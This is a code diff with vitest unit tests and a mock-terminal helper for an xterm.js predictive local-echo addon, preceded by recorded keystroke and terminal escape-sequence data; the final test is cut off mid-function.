{"keyAt":true,"data":"o"}
|
||||
{"delayMs":28,"data":"\u001b[18;99H\u001b[K\u001b[19;18H\u001b[K\u001b[21;80H\u001b[K\u001b[19;19H"}
|
||||
{"keyAt":true,"data":"v"}
|
||||
{"delayMs":26,"data":"\u001b[18;99H\u001b[K\u001b[19;19Ho\u001b[K\u001b[21;80H\u001b[K\u001b[19;20H"}
|
||||
{"keyAt":true,"data":"e"}
|
||||
{"delayMs":26,"data":"\u001b[18;99H\u001b[K\u001b[19;20Hv\u001b[K\u001b[21;80H\u001b[K\u001b[19;21H"}
|
||||
{"delayMs":17,"data":"\u001b[18;99H\u001b[K\u001b[19;21He\u001b[K\u001b[21;80H\u001b[K\u001b[19;22H"}
|
||||
{"keyAt":true,"data":"r"}
|
||||
{"delayMs":29,"data":"\u001b[18;99H\u001b[K\u001b[19;22Hr\u001b[K\u001b[21;80H\u001b[K\u001b[19;23H"}
|
||||
@@ -3,129 +3,204 @@
|
||||
*
|
||||
* Creates a minimal Terminal-like object that satisfies the addon's
|
||||
* requirements without needing a real xterm.js instance or DOM renderer.
|
||||
*
|
||||
* PredictiveEchoAddon additions (all ADDITIVE, existing tests unchanged):
|
||||
* mutable cursor via setCursor(), wide-char-aware getCell() on mock lines,
|
||||
* onWriteParsed/onResize emitters with fire* triggers, and opt-outs for
|
||||
* getCell support and the emitters (getCellSupport / emitters options).
|
||||
*/
|
||||
import { charCellWidth } from '../src/overlay-renderer.js';
|
||||
|
||||
interface MockLine {
|
||||
translateToString(_trimRight?: boolean): string;
|
||||
translateToString(_trimRight?: boolean): string;
|
||||
getCell?(x: number): { getChars(): string; getWidth(): number } | undefined;
|
||||
}
|
||||
|
||||
interface MockBufferOptions {
|
||||
lines: string[];
|
||||
viewportY?: number;
|
||||
baseY?: number;
|
||||
cursorX?: number;
|
||||
cursorY?: number;
|
||||
lines: string[];
|
||||
viewportY?: number;
|
||||
baseY?: number;
|
||||
cursorX?: number;
|
||||
cursorY?: number;
|
||||
}
|
||||
|
||||
interface MockTerminalOptions {
|
||||
buffer?: MockBufferOptions;
|
||||
cols?: number;
|
||||
rows?: number;
|
||||
fontFamily?: string;
|
||||
fontSize?: number;
|
||||
fontWeight?: string | number;
|
||||
theme?: {
|
||||
background?: string;
|
||||
foreground?: string;
|
||||
cursor?: string;
|
||||
};
|
||||
cellWidth?: number;
|
||||
cellHeight?: number;
|
||||
/** Device-pixel char top offset (for charTop calculation). Default: 0 */
|
||||
deviceCharTop?: number;
|
||||
/** Device-pixel char height (for charHeight calculation). Default: cellHeight * dpr */
|
||||
deviceCharHeight?: number;
|
||||
buffer?: MockBufferOptions;
|
||||
cols?: number;
|
||||
rows?: number;
|
||||
fontFamily?: string;
|
||||
fontSize?: number;
|
||||
fontWeight?: string | number;
|
||||
theme?: {
|
||||
background?: string;
|
||||
foreground?: string;
|
||||
cursor?: string;
|
||||
};
|
||||
cellWidth?: number;
|
||||
cellHeight?: number;
|
||||
/** Device-pixel char top offset (for charTop calculation). Default: 0 */
|
||||
deviceCharTop?: number;
|
||||
/** Device-pixel char height (for charHeight calculation). Default: cellHeight * dpr */
|
||||
deviceCharHeight?: number;
|
||||
/** Provide getCell() on mock lines (PredictiveEchoAddon). Default: true */
|
||||
getCellSupport?: boolean;
|
||||
/** Provide onWriteParsed/onResize emitters (PredictiveEchoAddon). Default: true */
|
||||
emitters?: boolean;
|
||||
}
|
||||
|
||||
/** Column-indexed cell access over a plain string, wide-char aware. */
|
||||
function cellAt(text: string, col: number): { getChars(): string; getWidth(): number } {
|
||||
let c = 0;
|
||||
for (const ch of text) {
|
||||
const w = charCellWidth(null, ch);
|
||||
if (col === c) return { getChars: () => ch, getWidth: () => w };
|
||||
if (w === 2 && col === c + 1) return { getChars: () => '', getWidth: () => 0 };
|
||||
c += w;
|
||||
}
|
||||
return { getChars: () => '', getWidth: () => 1 };
|
||||
}
|
||||
|
||||
export function createMockTerminal(opts: MockTerminalOptions = {}) {
|
||||
const bufOpts = opts.buffer ?? { lines: ['$ '] };
|
||||
const lines = bufOpts.lines;
|
||||
const viewportY = bufOpts.viewportY ?? 0;
|
||||
const baseY = bufOpts.baseY ?? viewportY;
|
||||
const cols = opts.cols ?? 80;
|
||||
const rows = opts.rows ?? Math.max(lines.length, 24);
|
||||
const cellW = opts.cellWidth ?? 8.4;
|
||||
const cellH = opts.cellHeight ?? 17;
|
||||
const bufOpts = opts.buffer ?? { lines: ['$ '] };
|
||||
const viewportY = bufOpts.viewportY ?? 0;
|
||||
const baseY = bufOpts.baseY ?? viewportY;
|
||||
const cols = opts.cols ?? 80;
|
||||
const rows = opts.rows ?? Math.max(bufOpts.lines.length, 24);
|
||||
const cellW = opts.cellWidth ?? 8.4;
|
||||
const cellH = opts.cellHeight ?? 17;
|
||||
const getCellSupport = opts.getCellSupport ?? true;
|
||||
const emitters = opts.emitters ?? true;
|
||||
|
||||
const mockLines: MockLine[] = lines.map((text) => ({
|
||||
translateToString: () => text,
|
||||
}));
|
||||
|
||||
// Create minimal DOM structure
|
||||
const element = document.createElement('div');
|
||||
element.className = 'terminal xterm';
|
||||
|
||||
const viewport = document.createElement('div');
|
||||
viewport.className = 'xterm-viewport';
|
||||
|
||||
const screen = document.createElement('div');
|
||||
screen.className = 'xterm-screen';
|
||||
screen.style.position = 'relative';
|
||||
|
||||
const xtermRows = document.createElement('div');
|
||||
xtermRows.className = 'xterm-rows';
|
||||
|
||||
element.appendChild(viewport);
|
||||
element.appendChild(screen);
|
||||
screen.appendChild(xtermRows);
|
||||
|
||||
// Append to document so getComputedStyle works
|
||||
document.body.appendChild(element);
|
||||
|
||||
const terminal = {
|
||||
element,
|
||||
cols,
|
||||
rows,
|
||||
options: {
|
||||
fontFamily: opts.fontFamily ?? 'monospace',
|
||||
fontSize: opts.fontSize ?? 14,
|
||||
fontWeight: opts.fontWeight ?? 'normal',
|
||||
theme: opts.theme ?? {},
|
||||
},
|
||||
buffer: {
|
||||
active: {
|
||||
viewportY,
|
||||
baseY,
|
||||
cursorX: bufOpts.cursorX ?? 0,
|
||||
cursorY: bufOpts.cursorY ?? 0,
|
||||
getLine: (absRow: number): MockLine | undefined => {
|
||||
return mockLines[absRow - viewportY];
|
||||
},
|
||||
},
|
||||
},
|
||||
_core: {
|
||||
_renderService: {
|
||||
dimensions: {
|
||||
css: {
|
||||
cell: { width: cellW, height: cellH },
|
||||
},
|
||||
device: {
|
||||
char: {
|
||||
top: opts.deviceCharTop ?? 0,
|
||||
height: opts.deviceCharHeight ?? cellH,
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
// Simulate loadAddon
|
||||
loadAddon(addon: { activate: (t: unknown) => void }) {
|
||||
addon.activate(this);
|
||||
},
|
||||
const makeLine = (text: string): { line: MockLine; set(t: string): void } => {
|
||||
let current = text;
|
||||
const line: MockLine = {
|
||||
translateToString: () => current,
|
||||
};
|
||||
if (getCellSupport) {
|
||||
line.getCell = (x: number) => cellAt(current, x);
|
||||
}
|
||||
return { line, set: (t: string) => (current = t) };
|
||||
};
|
||||
|
||||
return {
|
||||
terminal,
|
||||
/** Update buffer lines for subsequent calls */
|
||||
setLines(newLines: string[]) {
|
||||
mockLines.length = 0;
|
||||
for (const text of newLines) {
|
||||
mockLines.push({ translateToString: () => text });
|
||||
}
|
||||
let mockLines = bufOpts.lines.map(makeLine);
|
||||
|
||||
// Create minimal DOM structure
|
||||
const element = document.createElement('div');
|
||||
element.className = 'terminal xterm';
|
||||
|
||||
const viewport = document.createElement('div');
|
||||
viewport.className = 'xterm-viewport';
|
||||
|
||||
const screen = document.createElement('div');
|
||||
screen.className = 'xterm-screen';
|
||||
screen.style.position = 'relative';
|
||||
|
||||
const xtermRows = document.createElement('div');
|
||||
xtermRows.className = 'xterm-rows';
|
||||
|
||||
element.appendChild(viewport);
|
||||
element.appendChild(screen);
|
||||
screen.appendChild(xtermRows);
|
||||
|
||||
// Append to document so getComputedStyle works
|
||||
document.body.appendChild(element);
|
||||
|
||||
const writeParsedCbs = new Set<() => void>();
|
||||
const resizeCbs = new Set<(s: { cols: number; rows: number }) => void>();
|
||||
|
||||
const terminal = {
|
||||
element,
|
||||
cols,
|
||||
rows,
|
||||
options: {
|
||||
fontFamily: opts.fontFamily ?? 'monospace',
|
||||
fontSize: opts.fontSize ?? 14,
|
||||
fontWeight: opts.fontWeight ?? 'normal',
|
||||
theme: opts.theme ?? {},
|
||||
},
|
||||
buffer: {
|
||||
active: {
|
||||
viewportY,
|
||||
baseY,
|
||||
cursorX: bufOpts.cursorX ?? 0,
|
||||
cursorY: bufOpts.cursorY ?? 0,
|
||||
getLine: (absRow: number): MockLine | undefined => {
|
||||
return mockLines[absRow - viewportY]?.line;
|
||||
},
|
||||
/** Clean up DOM */
|
||||
cleanup() {
|
||||
element.remove();
|
||||
},
|
||||
},
|
||||
_core: {
|
||||
_renderService: {
|
||||
dimensions: {
|
||||
css: {
|
||||
cell: { width: cellW, height: cellH },
|
||||
},
|
||||
device: {
|
||||
char: {
|
||||
top: opts.deviceCharTop ?? 0,
|
||||
height: opts.deviceCharHeight ?? cellH,
|
||||
},
|
||||
},
|
||||
},
|
||||
};
|
||||
},
|
||||
},
|
||||
...(emitters
|
||||
? {
|
||||
onWriteParsed(cb: () => void) {
|
||||
writeParsedCbs.add(cb);
|
||||
return { dispose: () => writeParsedCbs.delete(cb) };
|
||||
},
|
||||
onResize(cb: (s: { cols: number; rows: number }) => void) {
|
||||
resizeCbs.add(cb);
|
||||
return { dispose: () => resizeCbs.delete(cb) };
|
||||
},
|
||||
}
|
||||
: {}),
|
||||
// Simulate loadAddon
|
||||
loadAddon(addon: { activate: (t: unknown) => void }) {
|
||||
addon.activate(this);
|
||||
},
|
||||
};
|
||||
|
||||
return {
|
||||
terminal,
|
||||
/** Update buffer lines for subsequent calls */
|
||||
setLines(newLines: string[]) {
|
||||
mockLines = newLines.map(makeLine);
|
||||
},
|
||||
/** Update one line's text in place (PredictiveEchoAddon echo simulation) */
|
||||
setLine(index: number, text: string) {
|
||||
mockLines[index]?.set(text);
|
||||
},
|
||||
/** Move the mock cursor (PredictiveEchoAddon) */
|
||||
setCursor(x: number, y: number) {
|
||||
terminal.buffer.active.cursorX = x;
|
||||
terminal.buffer.active.cursorY = y;
|
||||
},
|
||||
/** Set scroll state (viewportY / baseY) */
|
||||
setScroll(newViewportY: number, newBaseY: number) {
|
||||
terminal.buffer.active.viewportY = newViewportY;
|
||||
terminal.buffer.active.baseY = newBaseY;
|
||||
},
|
||||
/** Fire the onWriteParsed emitter (PredictiveEchoAddon reconcile trigger) */
|
||||
fireWriteParsed() {
|
||||
for (const cb of [...writeParsedCbs]) cb();
|
||||
},
|
||||
/** Fire the onResize emitter */
|
||||
fireResize(newCols = cols, newRows = rows) {
|
||||
for (const cb of [...resizeCbs]) cb({ cols: newCols, rows: newRows });
|
||||
},
|
||||
/** Number of live onWriteParsed listeners (dispose assertions) */
|
||||
writeParsedListenerCount() {
|
||||
return writeParsedCbs.size;
|
||||
},
|
||||
/** Number of live onResize listeners (dispose assertions) */
|
||||
resizeListenerCount() {
|
||||
return resizeCbs.size;
|
||||
},
|
||||
/** Clean up DOM */
|
||||
cleanup() {
|
||||
element.remove();
|
||||
},
|
||||
};
|
||||
}
|
||||
|
||||
@@ -0,0 +1,135 @@
|
||||
/**
|
||||
* @vitest-environment jsdom
|
||||
*
|
||||
* prediction-renderer unit tests: span geometry math, seam-cover height,
|
||||
* ligature suppression, incremental add/remove keyed by seq, and geometry
|
||||
* stability under a non-1 devicePixelRatio (all dims are CSS px).
|
||||
*/
|
||||
import { afterEach, describe, expect, it, vi } from 'vitest';
|
||||
import { addPredictionSpan, clearAllSpans, removePredictionSpan } from '../src/prediction-renderer.js';
|
||||
import type { CellDimensions, FontStyle } from '../src/types.js';
|
||||
|
||||
const dims: CellDimensions = { width: 9, height: 18, charTop: 1, charHeight: 16 };
|
||||
const font: FontStyle = {
|
||||
fontFamily: 'monospace',
|
||||
fontSize: '14px',
|
||||
fontWeight: 'normal',
|
||||
color: '#e0e0e0',
|
||||
backgroundColor: '#101010',
|
||||
letterSpacing: '0.5px',
|
||||
};
|
||||
|
||||
function makeContainer() {
|
||||
const el = document.createElement('div');
|
||||
document.body.appendChild(el);
|
||||
return el;
|
||||
}
|
||||
|
||||
function span(container: HTMLElement, map: Map<number, HTMLSpanElement>, over: Record<string, unknown> = {}) {
|
||||
addPredictionSpan(container, map, {
|
||||
seq: 1,
|
||||
row: 3,
|
||||
col: 5,
|
||||
char: 'x',
|
||||
width: 1,
|
||||
dims,
|
||||
font,
|
||||
underline: false,
|
||||
...over,
|
||||
} as never);
|
||||
return map.get((over.seq as number) ?? 1)!;
|
||||
}
|
||||
|
||||
describe('prediction-renderer', () => {
|
||||
afterEach(() => {
|
||||
document.body.innerHTML = '';
|
||||
vi.unstubAllGlobals();
|
||||
});
|
||||
|
||||
it('positions a width-1 span on the exact cell grid', () => {
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const s = span(makeContainer(), map);
|
||||
expect(s.style.left).toBe(`${5 * 9}px`);
|
||||
expect(s.style.top).toBe(`${3 * 18}px`);
|
||||
expect(s.style.width).toBe(`${9}px`);
|
||||
expect(s.textContent).toBe('x');
|
||||
});
|
||||
|
||||
it('positions a width-2 span across two cells', () => {
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const s = span(makeContainer(), map, { char: '你', width: 2 });
|
||||
expect(s.style.width).toBe(`${2 * 9}px`);
|
||||
});
|
||||
|
||||
it('covers the row seam: height is cellH+1 with line-height cellH', () => {
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const s = span(makeContainer(), map);
|
||||
expect(s.style.height).toBe(`${18 + 1}px`);
|
||||
expect(s.style.lineHeight).toBe('18px');
|
||||
});
|
||||
|
||||
it('disables ligatures and pointer events, applies font + letter-spacing', () => {
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const s = span(makeContainer(), map);
|
||||
expect(s.style.cssText).toContain("'liga' 0");
|
||||
expect(s.style.cssText).toContain("'calt' 0");
|
||||
expect(s.style.pointerEvents).toBe('none');
|
||||
expect(s.style.fontFamily).toBe('monospace');
|
||||
expect(s.style.letterSpacing).toBe('0.5px');
|
||||
expect(s.style.textAlign).toBe('center');
|
||||
});
|
||||
|
||||
it('paints an opaque background over only its own cells', () => {
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const s = span(makeContainer(), map);
|
||||
expect(['#101010', 'rgb(16, 16, 16)']).toContain(s.style.backgroundColor);
|
||||
// Background is bounded by the span's own width, never a full row
|
||||
expect(s.style.width).toBe('9px');
|
||||
});
|
||||
|
||||
it('underline renders only when requested', () => {
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const container = makeContainer();
|
||||
const plain = span(container, map, { seq: 1 });
|
||||
const lined = span(container, map, { seq: 2, underline: true });
|
||||
expect(plain.style.textDecoration).toBe('');
|
||||
expect(lined.style.textDecoration).toBe('underline');
|
||||
});
|
||||
|
||||
it('adds and removes incrementally, keyed by seq', () => {
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const container = makeContainer();
|
||||
span(container, map, { seq: 1 });
|
||||
span(container, map, { seq: 2, col: 6 });
|
||||
span(container, map, { seq: 3, col: 7 });
|
||||
expect(container.children).toHaveLength(3);
|
||||
|
||||
removePredictionSpan(map, 2);
|
||||
expect(container.children).toHaveLength(2);
|
||||
expect(map.has(2)).toBe(false);
|
||||
expect(map.has(1)).toBe(true);
|
||||
expect(map.has(3)).toBe(true);
|
||||
|
||||
removePredictionSpan(map, 999); // unknown seq: no-op
|
||||
expect(container.children).toHaveLength(2);
|
||||
});
|
||||
|
||||
it('clearAllSpans empties both the DOM and the map', () => {
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const container = makeContainer();
|
||||
span(container, map, { seq: 1 });
|
||||
span(container, map, { seq: 2, col: 6 });
|
||||
clearAllSpans(map);
|
||||
expect(container.children).toHaveLength(0);
|
||||
expect(map.size).toBe(0);
|
||||
});
|
||||
|
||||
it('geometry is stable under devicePixelRatio 2 (dims are CSS px)', () => {
|
||||
vi.stubGlobal('devicePixelRatio', 2);
|
||||
const map = new Map<number, HTMLSpanElement>();
|
||||
const s = span(makeContainer(), map);
|
||||
expect(s.style.left).toBe(`${5 * 9}px`);
|
||||
expect(s.style.top).toBe(`${3 * 18}px`);
|
||||
expect(s.style.width).toBe('9px');
|
||||
});
|
||||
});
|
||||
@@ -0,0 +1,538 @@
|
||||
/**
|
||||
* @vitest-environment jsdom
|
||||
*
|
||||
* PredictiveEchoAddon unit tests: the algorithm laws (anchoring, prefix-only
|
||||
* confirmation with cursor advance, two-pass mismatch cascade with neutral
|
||||
* blanks, TTL, off-row grace, gates) and lifecycle safety.
|
||||
*
|
||||
* Timer-based cases fake `performance` explicitly: the addon clocks
|
||||
* sentAt/TTL/grace with performance.now(), which vitest does NOT fake by
|
||||
* default.
|
||||
*/
|
||||
import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest';
|
||||
import { PredictiveEchoAddon } from '../src/predictive-echo-addon.js';
|
||||
import { createMockTerminal } from './helpers.js';
|
||||
|
||||
const TIMER_CONFIG = {
|
||||
toFake: ['setTimeout', 'clearTimeout', 'setInterval', 'clearInterval', 'Date', 'performance'] as const,
|
||||
};
|
||||
|
||||
/** Composer-like buffer: `› ` marker + placeholder, cursor at col 2 row 0. */
|
||||
function composerMock(opts: Parameters<typeof createMockTerminal>[0] = {}) {
|
||||
return createMockTerminal({
|
||||
buffer: { lines: ['› Use /skills to list', '', ''], cursorX: 2, cursorY: 0 },
|
||||
...opts,
|
||||
});
|
||||
}
|
||||
|
||||
function spansOf(mock: ReturnType<typeof createMockTerminal>): HTMLSpanElement[] {
|
||||
const screen = mock.terminal.element.querySelector('.xterm-screen')!;
|
||||
return Array.from(screen.querySelectorAll('[data-predictive-echo] span')) as HTMLSpanElement[];
|
||||
}
|
||||
|
||||
async function flushMicrotasks() {
|
||||
await Promise.resolve();
|
||||
await Promise.resolve();
|
||||
}
|
||||
|
||||
describe('PredictiveEchoAddon', () => {
|
||||
let mock: ReturnType<typeof createMockTerminal>;
|
||||
let addon: PredictiveEchoAddon;
|
||||
|
||||
beforeEach(() => {
|
||||
vi.useFakeTimers(TIMER_CONFIG);
|
||||
mock = composerMock();
|
||||
addon = new PredictiveEchoAddon();
|
||||
addon.activate(mock.terminal as never);
|
||||
});
|
||||
|
||||
afterEach(() => {
|
||||
addon.dispose();
|
||||
mock.cleanup();
|
||||
vi.useRealTimers();
|
||||
});
|
||||
|
||||
it('paints a span at the cursor cell and returns true', () => {
|
||||
expect(addon.predictChar('h')).toBe(true);
|
||||
const spans = spansOf(mock);
|
||||
expect(spans).toHaveLength(1);
|
||||
expect(spans[0].textContent).toBe('h');
|
||||
expect(spans[0].style.left).toBe(`${2 * 8.4}px`);
|
||||
expect(spans[0].style.top).toBe('0px');
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
});
|
||||
|
||||
it('stacks predictions at anchor+cumulative width while the cursor is unmoved', () => {
|
||||
addon.predictChar('h');
|
||||
addon.predictChar('e');
|
||||
addon.predictChar('y');
|
||||
const spans = spansOf(mock);
|
||||
expect(spans.map((s) => s.style.left)).toEqual([`${2 * 8.4}px`, `${3 * 8.4}px`, `${4 * 8.4}px`]);
|
||||
expect(addon.state.anchor).toEqual({ row: 0, col: 2 });
|
||||
});
|
||||
|
||||
it('re-anchors at the new cursor once outstanding drains to zero', async () => {
|
||||
addon.predictChar('h');
|
||||
mock.setLine(0, '› h');
|
||||
mock.setCursor(3, 0);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
expect(addon.state.anchor).toBeNull();
|
||||
|
||||
addon.predictChar('i');
|
||||
expect(addon.state.anchor).toEqual({ row: 0, col: 3 });
|
||||
expect(spansOf(mock)[0].style.left).toBe(`${3 * 8.4}px`);
|
||||
});
|
||||
|
||||
it('inline reconcile inside predictChar absorbs an echo that landed between keystrokes', () => {
|
||||
addon.predictChar('h');
|
||||
// Echo lands but no onWriteParsed fires before the next keystroke
|
||||
mock.setLine(0, '› h');
|
||||
mock.setCursor(3, 0);
|
||||
expect(addon.predictChar('i')).toBe(true);
|
||||
// 'h' confirmed inline; 'i' anchored at the advanced cursor, not stacked
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
expect(addon.state.confirmedTotal).toBe(1);
|
||||
expect(addon.state.anchor).toEqual({ row: 0, col: 3 });
|
||||
});
|
||||
|
||||
it('confirms and removes exactly the echoed prefix (cell match + cursor advance)', async () => {
|
||||
addon.predictChar('a');
|
||||
addon.predictChar('b');
|
||||
addon.predictChar('c');
|
||||
mock.setLine(0, '› ab');
|
||||
mock.setCursor(4, 0); // advanced past 'a' and 'b' only
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.confirmedTotal).toBe(2);
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
expect(spansOf(mock).map((s) => s.textContent)).toEqual(['c']);
|
||||
});
|
||||
|
||||
it('partial confirmation never moves remaining spans (no jitter)', async () => {
|
||||
addon.predictChar('a');
|
||||
addon.predictChar('b');
|
||||
const bLeft = spansOf(mock)[1].style.left;
|
||||
mock.setLine(0, '› a');
|
||||
mock.setCursor(3, 0);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(spansOf(mock)).toHaveLength(1);
|
||||
expect(spansOf(mock)[0].style.left).toBe(bLeft);
|
||||
});
|
||||
|
||||
it('does NOT confirm when the cell matches but the cursor has not advanced (in-place repaint)', async () => {
|
||||
// Predict 'U' over the placeholder whose cell already shows 'U'
|
||||
addon.predictChar('U');
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
// tmux repaints the identical row; cursor stays at the anchor
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
expect(addon.state.confirmedTotal).toBe(0);
|
||||
});
|
||||
|
||||
it('does NOT confirm or drop when the predicted char equals the pre-existing snapshot', async () => {
|
||||
addon.predictChar('U');
|
||||
// Several passes over the unchanged placeholder: no confirm, no cascade
|
||||
for (let i = 0; i < 4; i++) {
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
}
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
expect(addon.state.droppedTotal).toBe(0);
|
||||
});
|
||||
|
||||
it('one transient mismatch survives; a persistent foreign cell cascades (two-pass rule)', async () => {
|
||||
addon.predictChar('a');
|
||||
mock.setLine(0, '› Z'); // foreign non-blank at the predicted cell
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(1); // pass 1: survives
|
||||
|
||||
// Transient recovery resets the counter
|
||||
mock.setLine(0, '› Use /skills to list');
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
mock.setLine(0, '› Z');
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(1); // count restarted, pass 1 again
|
||||
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(0); // pass 2: cascaded
|
||||
expect(addon.state.droppedTotal).toBe(1);
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
});
|
||||
|
||||
it('blank cells are neutral: placeholder cleared under predictions does not cascade', async () => {
|
||||
// Predict over placeholder text, then codex clears the placeholder on
|
||||
// first echo: later cells become blank, which must NOT count as
|
||||
// foreign (measured behavior; without this, fast typing over the
|
||||
// placeholder drops exactly when RTT is high).
|
||||
addon.predictChar('h');
|
||||
addon.predictChar('i');
|
||||
mock.setLine(0, '› h'); // 'h' echoed; placeholder gone; 'i' cell now blank
|
||||
mock.setCursor(3, 0);
|
||||
for (let i = 0; i < 4; i++) {
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
}
|
||||
expect(addon.state.confirmedTotal).toBe(1);
|
||||
expect(addon.state.outstanding).toBe(1); // 'i' still pending, TTL-bounded
|
||||
expect(addon.state.droppedTotal).toBe(0);
|
||||
});
|
||||
|
||||
it('mismatch cascade drops the record and all later ones, earlier confirmed stay gone', async () => {
|
||||
addon.predictChar('a');
|
||||
addon.predictChar('b');
|
||||
addon.predictChar('c');
|
||||
mock.setLine(0, '› aXX'); // 'a' echoed; foreign 'X' under 'b' and 'c'
|
||||
mock.setCursor(3, 0);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.confirmedTotal).toBe(1);
|
||||
expect(addon.state.droppedTotal).toBe(2);
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
});
|
||||
|
||||
it('TTL expiry drops predictions and leaves no timers armed (fake timers)', () => {
|
||||
addon.predictChar('a');
|
||||
addon.predictChar('b');
|
||||
expect(vi.getTimerCount()).toBe(1);
|
||||
vi.advanceTimersByTime(1100);
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
expect(addon.state.droppedTotal).toBe(2);
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
expect(vi.getTimerCount()).toBe(0);
|
||||
});
|
||||
|
||||
it('TTL timer re-arms for remaining records after a partial confirm', async () => {
|
||||
addon.predictChar('a'); // t=0, deadline ~1001
|
||||
vi.advanceTimersByTime(600);
|
||||
addon.predictChar('b'); // t=600, deadline ~1601
|
||||
// Echo confirms 'a' before its TTL; 'b' remains
|
||||
mock.setLine(0, '› a');
|
||||
mock.setCursor(3, 0);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
vi.advanceTimersByTime(450); // t=1050: a's timer fired, b (age 450) survives
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
expect(vi.getTimerCount()).toBe(1); // re-armed for b
|
||||
vi.advanceTimersByTime(600); // t=1650: b expired
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
expect(vi.getTimerCount()).toBe(0);
|
||||
});
|
||||
|
||||
it('cursor off anchor row within grace keeps predictions; sustained off-row drops all', async () => {
|
||||
addon.predictChar('a');
|
||||
mock.setCursor(0, 5);
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(1); // transient excursion tolerated
|
||||
|
||||
vi.advanceTimersByTime(200); // > cursorGraceMs (150)
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
});
|
||||
|
||||
it('viewportY !== baseY clears predictions (scrolled up)', async () => {
|
||||
addon.predictChar('a');
|
||||
mock.setScroll(0, 5); // user scrolled: viewport pinned above baseY
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.outstanding).toBe(0);
|
||||
// And no new predictions while scrolled
|
||||
expect(addon.predictChar('b')).toBe(false);
|
||||
});
|
||||
|
||||
it('maxPending: the 33rd predictChar returns false', () => {
|
||||
for (let i = 0; i < 32; i++) {
|
||||
expect(addon.predictChar('x')).toBe(true);
|
||||
}
|
||||
expect(addon.predictChar('y')).toBe(false);
|
||||
expect(addon.state.outstanding).toBe(32);
|
||||
});
|
||||
|
||||
it('edge margin: a prediction landing within edgeMarginCells of cols returns false', () => {
|
||||
mock.setCursor(75, 0); // cols 80, margin 4: col 75 + 1 <= 76 allowed
|
||||
expect(addon.predictChar('a')).toBe(true);
|
||||
// Next lands at col 76: 77 > 76 suppressed
|
||||
expect(addon.predictChar('b')).toBe(false);
|
||||
});
|
||||
|
||||
it('predictWhen gate false suppresses painting, predictChar just returns false', () => {
|
||||
addon.setPredictWhen(() => false);
|
||||
expect(addon.predictChar('a')).toBe(false);
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
});
|
||||
|
||||
it('setPredictWhen(null) removes the gate at runtime', () => {
|
||||
addon.setPredictWhen(() => false);
|
||||
expect(addon.predictChar('a')).toBe(false);
|
||||
addon.setPredictWhen(null);
|
||||
expect(addon.predictChar('a')).toBe(true);
|
||||
});
|
||||
|
||||
it('multi-codepoint graphemes and control chars return false', () => {
|
||||
for (const bad of ['ab', '\x1b', '\x03', '\r', '\n', '\t', '\x7f', '👨👩👧', '']) {
|
||||
expect(addon.predictChar(bad)).toBe(false);
|
||||
}
|
||||
expect(spansOf(mock)).toHaveLength(0);
|
||||
// Single astral emoji IS a single codepoint: predicted (width 2)
|
||||
expect(addon.predictChar('😀')).toBe(true);
|
||||
});
|
||||
|
||||
it('CJK: 2-cell span, next prediction offsets by 2, confirm reads the leading cell', async () => {
|
||||
expect(addon.predictChar('你')).toBe(true);
|
||||
const first = spansOf(mock)[0];
|
||||
expect(first.style.width).toBe(`${2 * 8.4}px`);
|
||||
addon.predictChar('a');
|
||||
expect(spansOf(mock)[1].style.left).toBe(`${4 * 8.4}px`); // 2 + width 2
|
||||
|
||||
mock.setLine(0, '› 你');
|
||||
mock.setCursor(4, 0); // advanced past the wide char
|
||||
mock.fireWriteParsed();
|
||||
await flushMicrotasks();
|
||||
expect(addon.state.confirmedTotal).toBe(1);
|
||||
expect(addon.state.outstanding).toBe(1);
|
||||
});
|
||||
|
||||
it('getCell-less terminal: ASCII fallback works, wide chars suppressed', () => {
|
||||
const bare = createMockTerminal({
|
||||
buffer: { lines: ['› ', ''], cursorX: 2, cursorY: 0 },
|
||||
getCellSupport: false,
|
